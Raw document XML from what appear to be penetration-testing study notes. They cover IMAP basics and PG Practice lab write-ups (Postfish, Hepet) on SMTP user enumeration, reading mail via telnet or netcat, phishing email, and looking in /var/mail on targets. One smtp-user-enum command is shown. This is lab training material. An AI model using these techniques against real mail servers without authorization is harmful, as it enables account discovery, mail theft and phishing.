        </w:rPr>
        <w:t xml:space="preserve">Ports: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">143 (default), 993 (SSL).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002898">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike POP3, IMAP keeps emails on the server by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002899">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lets you manage mail in place (folders, flags like "Seen" or "Answered").</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000289A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Syncs across devices: if you read/delete/move an email on one client, it’s reflected everywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000289B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analogy: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like reading your mail directly at the post office — you leave it there, organize it into boxes, but don’t have to take it all home.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000289C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000289D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000289E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000289F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId842">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice also has good smtp user enumeration and reading emails and sending phishing email using SMTP. They logged into POP3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId843">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hepet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice does some good enumeration for SMTP and IMAP since it was a phishing attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp-user-enum -M VRFY -U users.txt -t 192.168.134.140</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then used the creds they found here to enumerate IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2997200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="25" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84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28A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4hr2y9luauks" w:id="353"/>
      <w:bookmarkEnd w:id="353"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a guide below on how to read mail (via IMAP port 143) using telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4852988" cy="3582742"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="369" name="image350.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image350.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId845"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4852988" cy="3582742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5043488" cy="3248872"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="555" name="image539.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image539.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId846"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5043488" cy="3248872"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4764571" cy="4214813"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="215" name="image203.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image203.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId847"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4764571" cy="4214813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5099050" cy="3824288"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="151" name="image143.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image143.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId848"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5099050" cy="3824288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="546"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This other </w:t>
      </w:r>
      <w:hyperlink r:id="rId849">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hepet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId850">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">original</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Writeup also does a lot of enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="546"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They use netcat to read mail instead</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Postfish PG Practice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a really hard box but it's all about interacting with POP3, IMAP, and SMTP. It even teaches us how to use tools to enumerate each one, as well as sending mail using telnet/nc and interacting with the raw ports using telnet. They logged into POP3. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are two good writeups:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More concise: </w:t>
      </w:r>
      <w:hyperlink r:id="rId851">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Longer but goes into more-depth: </w:t>
      </w:r>
      <w:hyperlink r:id="rId852">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@whitebearr82/pgpractice-linux-postfish-192-168-56-137-9a48d8577c5f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28B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B9">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BA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gp34kouyt0eh" w:id="354"/>
      <w:bookmarkEnd w:id="354"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just a tip: If you see port 25 or SMTP on the target, always look through /var/mail/ and /var/spool/mail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BE">
      <w:pPr>
        <w:numPr>
